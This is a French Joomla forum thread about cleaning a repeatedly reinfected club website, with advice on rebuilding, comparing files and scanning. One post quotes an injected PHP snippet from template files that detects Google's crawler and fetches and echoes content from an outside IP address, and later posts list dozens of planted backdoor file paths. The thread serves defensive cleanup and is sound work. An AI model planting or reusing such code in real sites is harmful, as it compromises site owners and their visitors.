Site vérolé depuis plusieurs semaines

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Site vérolé depuis plusieurs semaines

    Bonjour,

    Tout est dans le titre :-)
    Le site http://mjcrunning.fr/ est fonctionnel depuis de nombreuses années et sert surtout de forum Kunena pour un club.

    Avant d'en arriver à ce forum Joomla, j'ai épuisé mes connaissances sur le sujet en sachant que je n'ai pas de sauvegarde d'avant la vérole:

    - J'ai changé tous les mots de passe ftp, superuser etc... sans mettre le même
    - J'ai tenté de mettre les .htaccess et index.php de la racine en 404
    - J'ai réinstallé Joomla qui est toujours à jour sérieusement.
    - Je supprime le contenu des répertoires cache et de tmp
    - j'ai lancé des programmes de scan qui ne détectent rien qui ne m'interpellent.
    - je supprime bien évidement tous ce qui est bidouillé par le scrip malsain

    Et au final, il y a toujours un script qui parvient à tourner et à:
    - Ecraser le .htaccess de la racine
    - Ajouter du code au début du index.php de la racine
    - Ajouter un répertoire WP-admin sur la racine
    - Ajouter un fichier wp-load.php à la racine
    - Bidouiller les répertoires cache et tmp
    - Sous www\components\com_users\models, à ajouter blogking.php+leyeuts.php

    J'ai beau lui faire la peau , je n'arrive pas à identifier et empecher ce script de se lancer ou de bloquer des fichiers en modification.

    Merci pour votre aide!


    Dernière édition par unmick___ à 19/02/2020, 16h37

  • #2
    Bonjour et bienvenue,

    Est-ce que vous êtes seul sur cet hébergement ?

    Lorsque cela se produit,
    - je monte un environnement en local (uwamp ou wampserver)
    - je fais une sauvegarde via AkeebaBackup,
    - je rapatrie en local et je lance kickstart d'akeeba
    - avant de finir la restauration, je lance un coup d'antivirus Windows
    - j'installe sur un autre répertoire une copie propre Joomla avec les composants que j'utilise en dernière version,
    - je compare avec winmerge les 2 répertoires et cela donne en général de bons résultats

    Il reste :
    - le problème du répertoire images qui est souvent l'endroit où se cache les virus (faux fichiers image, fichiers php ou html,...)
    - le contenu de la base de données qui peut contenir des saletés dans les messages ou les articles

    Pascal
    If anything can go wrong, it will...If I can help, I will ..https://conseilgouz.com

    Commentaire


    • #3
      En cherchant à décrire mon souci, j'ai trouvé un bout de code en entete des index.php des trois themes présents qui me paraissent plus que suspicieux .
      je viens de les inhiber mais pour le partage de connaissance :

      $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if (strpos($botbotbot,"google")){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.xx.xxx.xx/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}

      Dernière édition par pmleconte à 12/02/2020, 12h32

      Commentaire


      • #4
        D'où proviennent vos templates ?
        If anything can go wrong, it will...If I can help, I will ..https://conseilgouz.com

        Commentaire


        • #5
          Je suis sur un hébergement mutualisé.
          Suite à la remarque sur le fichier image, j'ai trouvé trois .ico vraiment pas catholique que j'ai supprimé.

          En template j'ai ashton de www.globbersthemes.com que je n'utilise plus , Quasar de www.rockettheme.com que je n'utilise pas et tx_morph de JoomlArt.com

          Il me reste à checker les articles comme indiqué avant la grande reinstalle/comparaison que je n'ai pas envie de faire :-)

          Je vois déjà demain si ça revient après le nettoyage des index.php des templates et la suppression des .ico

          Merci

          Commentaire


          • #6
            Bonjour,

            Le nettoyage des index ne réglera rien si un script est caché quelque part dans le dossier du site, ce qui est le plus probable, comme dit par Pascal.
            La solution de Pascal est lourde, tu peux aussi ou en plus exécuter aeSecure Quickstart pour rechercher le(s) fautif(s), sachant qu'il faut faire la part des choses entre les fichiers sains où ce quickstart décèle des termes pouvant être indésirables et les vrais indésirables.

            Personnellement, lorsque je ne veux pas perdre de temps, j'installe un site vierge et avec JMigrator j'importe toutes les données "core" du site, les tables des extensions et je réinstalle les extensions pour qu'elles prennent en compte leurs précédentes données.
            Ensuite, il reste le point délicat : avant de les importer, s'assurer que dans le dossier des images il n'y a pas ce script malicieux ; idem si tu as des dossiers spécifiques pour des documents.
            "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
            MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

            Commentaire


            • #7
              Merci à vous.
              Ce matin première fois que le script ne s'est pas éxécuté correctement. Il s'execute mais doit être enfin bloqué
              Au niveau des logs, j'ai tout de même des tentatives de connexion régulières de 38.145.70.158
              J'ai aussi un blogking.php qui s'est installé sous www/components/com_users/models

              Je vais gratter ce week-end le site....

              Commentaire


              • #8
                Bonjour

                As-tu testé aeSecure QuickScan, sans nul doute il devrait te permettre d'identifier certains scripts malhonnêtes...

                Bonne journée.
                Christophe (cavo789)
                Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                Commentaire


                • #9
                  ​​​​Merci.

                  J'ai crié victoire trop vite : La vérole est revenue entre temps.
                  J'avais déjà lancé le aeSecure QuickScan .... Je viens de le réinstaller

                  J'ai beaucoup de Signature : base64_decode mais j'ai du mal à dire si c'est le mal absolu ou si c'est logique ....

                  Mais comment après modif de tous les mots de passe et modification des droits, un script peut passer outre :-) Le truc à devenir dingue.




                  Dernière édition par pmleconte à 13/02/2020, 15h59 Raison: Suppression du lien

                  Commentaire


                  • #10
                    Je viens vite de regarder, je suis ... perplexe. Mon programme dit qu'il a détecté, avec certitude, 20 fichiers malsains mais il n'en fait pas mention. Je vois beaucoup de résultats avec des "fortes probabilités" mais je ne vois pas les 20 fichiers qui sont certains. Étrange...

                    Cela fait maintenant quelques années que j'ai développé QuickScan et il me paraît logique d'avoir une liste des 20 fichiers incriminés... je ne les vois pas dans les résultats. Étonnant.

                    QuickScan est développé de manière totalement bénévole mais je veux bien prendre le temps de regarder pourquoi les 20 fichiers ne sont pas listés. Si cela te convient, pourrais-tu mettre à ma disposition une copie de ton site (je n'ai besoin que des fichiers; pas de la base de données; une simple archive ZIP avec les fichiers ferait l'affaire).

                    Si cela te convient, je pourrais alors lancer QuickScan sur ma machine et améliorer l'outil. Comprends bien que je ne vais pas nettoyer ton site; juste l'utiliser pour accroître l'efficacité du script. A toi de voir du coup Envoie-moi un message privé si tu souhaites que je te communique mon email.

                    >components/com_config/controller/modules/cancel.php

                    Très simplement parce que le virus serait toujours présent. Dans l'hypothèse où le virus est déjà là, quand quelqu'un accès à tonsite/image/virus.php, il exécute le virus. Que les mots de passe aient été modifié; peu importe; le script se lance dans le contexte du site Joomla (et donc avec les droits de Joomla).

                    Bonne journée.


                    Christophe (cavo789)
                    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                    Commentaire


                    • #11
                      Bonjour,

                      Je m'immisce : vous avez oublié de supprimer QuickScan, donc, j'ai supprimé le lien.

                      Pascal
                      If anything can go wrong, it will...If I can help, I will ..https://conseilgouz.com

                      Commentaire


                      • #12
                        Bonjour,

                        Je viens de faire le nettoyage!

                        Merci

                        Mick

                        Commentaire


                        • #13
                          Très rapide coup d'oeil entre deux cuissons :

                          Virus
                          media\com_finder\css\ajax-setAdvancedSettings.php.suspected
                          media\jui\css\shell-render.php.suspected
                          images\ugafajkb.php
                          images\phocagallery\swe.php.suspected
                          components\com_users\views\registration\5e3154360a dd8.php
                          components\com_content\helpers\ajax-setAdvancedSettings.php.suspected

                          Fichier natif de Joomla mais vérolé
                          includes\framework.php


                          Cette liste n'est absolument pas exhaustive
                          Christophe (cavo789)
                          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                          Commentaire


                          • #14
                            Bonsoir,

                            Un seul fichier restant avec du code vérolé, et le site est toujours vulnérable.
                            Il faut mettre le site hors ligne le temps du nettoyage ou le hacker / robot risque de modifier en même temps les fichiers (ou en ajouter de nouveau).

                            Même après cela, il va falloir trouver par où est entré le hacker ou tous les efforts ne serviront à rien...

                            Cordialement,
                            Chabi01 - http://www.xlformation.com

                            Commentaire


                            • #15

                              Re,

                              Quelques autres fichiers vérolés (liste non exhaustive)

                              * administrator\components\com_phocagallery\librarie s\phocagallery\facebook\fbsystem.php
                              * administrator\components\com_uddeim\admin.usersett ings.php
                              * administrator\components\com_categories\sudpfnce.p hp
                              * administrator\components\com_templates\abulzhce.ph p
                              * administrator\components\com_users\views\fxwdlvlx. php
                              * components\com_content\helpers\ajax-setAdvancedSettings.php.suspected
                              * components\com_users\models\new_side.php
                              * components\com_users\models\leyeuts.php
                              * components\com_config\controller\modules\wenscvya. php
                              * components\com_newsfeeds\views\category\axzflpgx.p hp
                              * components\com_users\views\registration\5e3154360a dd8.php
                              * images\ugafajkb.php
                              * images\phocagallery\swe.php.suspected
                              * media\com_finder\css\ajax-setAdvancedSettings.php.suspected
                              * media\jui\css\shell-render.php.suspected
                              * templates\rt_quasar\language\newsfeed-render.php
                              * templates\ashton\index.php
                              * plugins\editors\none\shell-render.php.suspected
                              * plugins\installer\folderinstaller\lvnpvlud.php
                              * libraries\fof\render\newsfeed-render.php
                              * libraries\joomla\database\query\zlbrucfd.php
                              * libraries\src\pdrizjmt.php

                              aeSecure QuickScan va les détecter dorénavant; je viens de mettre les fichiers de signatures à jour à l'instant (https://github.com/cavo789/aesecure_quickscan).

                              Deux autres remarques:

                              * ton template ashton a toujours mootools d'actif (mootools a disparu au profit de jquery). La version de mootools que tu as date de 2006 (wow!!!)
                              * uddeIm serait encore en version 3.1 (cette version date de 2013, n'aurais-tu pas oublié quelques mises-à-jour?)

                              Note : cet exemple me donne une fois encore l'occasion de répéter le mantra suivant: il n'est pas possible de nettoyer un site à la main; sans outil. Les virus peuvent se cacher partout; même dans une image (une fausse gif), un faux robots.txt, ... Il existe quantité de moyens de dissimuler des virus et de rendre exécutable des fichiers qui ne le sont pas (au travers du .htaccess). J'ai déjà vu des virus qui se cachent dans plusieurs fois à la manière d'un puzzle et un script qui collecte les pièces pour exécuter la bestiole.

                              Quand un site est vérolé; le mieux est toujours de récupérer un backup sain ou d'utiliser des techniques complètes comme celles évoquées par différentes personnes sur ce forum. Chercher les virus en regardant "juste armé de ses yeux" ici et là, dans tel ou tel dossier, n'est juste pas possible. On peut trouver des fichiers, oui (un fichier .php dans le dossier images est obligatoirement suspect) mais un code vérolé qui a été ajouté dans un fichier à priori sain (le fameux includes\framework.php est un parfait exemple); ça, c'est impossible sans un outil dédicacé.

                              Bonne soirée et bon nettoyage...

                              Christophe
                              Christophe (cavo789)
                              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X